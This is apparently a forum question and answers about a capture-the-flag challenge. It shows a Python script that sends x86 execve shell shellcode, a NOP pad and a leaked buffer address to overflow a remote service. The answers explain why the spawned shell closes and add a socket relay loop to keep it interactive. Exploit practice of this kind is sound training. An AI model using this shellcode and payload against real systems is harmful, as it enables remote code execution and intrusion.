
Buffer Overflow Exploit over TCP won't keep shell open

I have crafted a buffer overflow exploit for a remote machine for this CTF. The challenge prints out an address, which you then have to use in order to know where your shellcode is being stored. Attached is my current exploit code:

    import socket
    import struct
    import sys
    import time
    from ast import literal_eval

    if len(sys.argv) != 3:
        print "Usage: %s host port" % (sys.argv[0])
        sys.exit(0)

    s = socket.create_connection((sys.argv[1], int(sys.argv[2])))
    received = s.recv(4096)   # banner, which includes the printed buffer address
    print(received)
    # input that steers the program onto the path where the overflow happens
    s.send("9999\n")
    time.sleep(.2)
    raw_input("EXPLOIT ?? ")

    print s.recv(4096)

    # 28-byte x86 execve("/bin//sh") shellcode, then a NOP pad, then the return address
    sh = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
    pad = "\x90" * 251
    # the banner carries the buffer address as a 0x... literal at offset 13:23;
    # pack it as a native-endian 32-bit value
    IP = struct.pack("I", literal_eval(received[13:23]))
    print("ADDR: ", received[13:23])
    s.send(sh + pad + IP)

Essentially, first I am creating the connection, then I am sending an input that directs the program to where it needs to go in order for the exploit to be possible (not really relevant for this question).

Next I create the exploit itself.

The basic premise is:

shellcode + padding + eip

The eip address comes from what is given to me by the output of the program (which is what I am parsing in the IP variable).

That address is the beginning of the buffer, which is where my shellcode starts, and thus where I want to jump to.

I am running the binary using socat so that it is identical to the challenge hosted on the CTF's servers. I attach to the process using GDB and then run my exploit. It succeeds but gives this output:

    process 2422 is executing new program: /usr/bin/dash
    [Inferior 1 (process 2422) exited normally]
    (gdb)

and my connection to the service is terminated.

If I were running this with a local binary, I would use (python file.py ; cat - ;) | ./program to keep the stream open, but that is not an option since I need what the program outputs and have to do it remotely. I have tried using Telnet as well, but then the program just hangs and nothing happens.

Running the exploit script through tmux worked for me.
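What kills the shell is that the script returns from its last send() and exits, which closes the socket that socat hands the program as stdin, so the new shell reads EOF and exits just as the GDB output shows; the local cat - trick and the tmux answer both work by keeping that stream open. The following is an added example (Python 3, not code from the question or the answer) of doing the same inside the script with a select loop; the fake_shell below is a constructed stand-in for the remote service so it runs offline:

```python
import io
import os
import select
import socket
import threading

def interact(sock, stdin, stdout, bufsize=4096):
    """Relay stdin -> socket and socket -> stdout until the remote side closes.
    Leaving this loop (or ending the script right after send()) closes the socket."""
    sources = [sock, stdin]
    received = 0
    while True:
        readable, _, _ = select.select(sources, [], [])
        if sock in readable:
            data = sock.recv(bufsize)
            if not data:                       # remote closed: the shell is gone
                return received
            received += len(data)
            stdout.write(data)
            stdout.flush()
        if stdin in readable:
            chunk = os.read(stdin.fileno(), bufsize)   # unbuffered read, select-safe
            if chunk:
                sock.sendall(chunk)
            else:                              # local EOF (Ctrl-D): half-close only
                sources.remove(stdin)
                sock.shutdown(socket.SHUT_WR)

def fake_shell(peer):
    """Constructed stand-in for the shell behind socat: print a prompt, answer
    one command, then exit once its stdin (the socket) hits EOF."""
    peer.sendall(b"$ ")
    peer.sendall(b"ran: " + peer.recv(4096))
    while peer.recv(4096):                     # drain until the client half-closes
        pass
    peer.close()

def demo():
    """Drive interact() against fake_shell; returns (bytes received, output)."""
    ours, theirs = socket.socketpair()
    threading.Thread(target=fake_shell, args=(theirs,), daemon=True).start()
    rfd, wfd = os.pipe()                       # stands in for the terminal's stdin
    os.write(wfd, b"id\n")
    os.close(wfd)                              # EOF, as if the user pressed Ctrl-D
    out = io.BytesIO()
    with os.fdopen(rfd, "rb", buffering=0) as stdin:
        received = interact(ours, stdin, out)
    return received, out.getvalue()            # (10, b"$ ran: id\n")
```

In the real script you would call interact(s, sys.stdin.buffer, sys.stdout.buffer) right after the final send() instead of letting the process exit.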
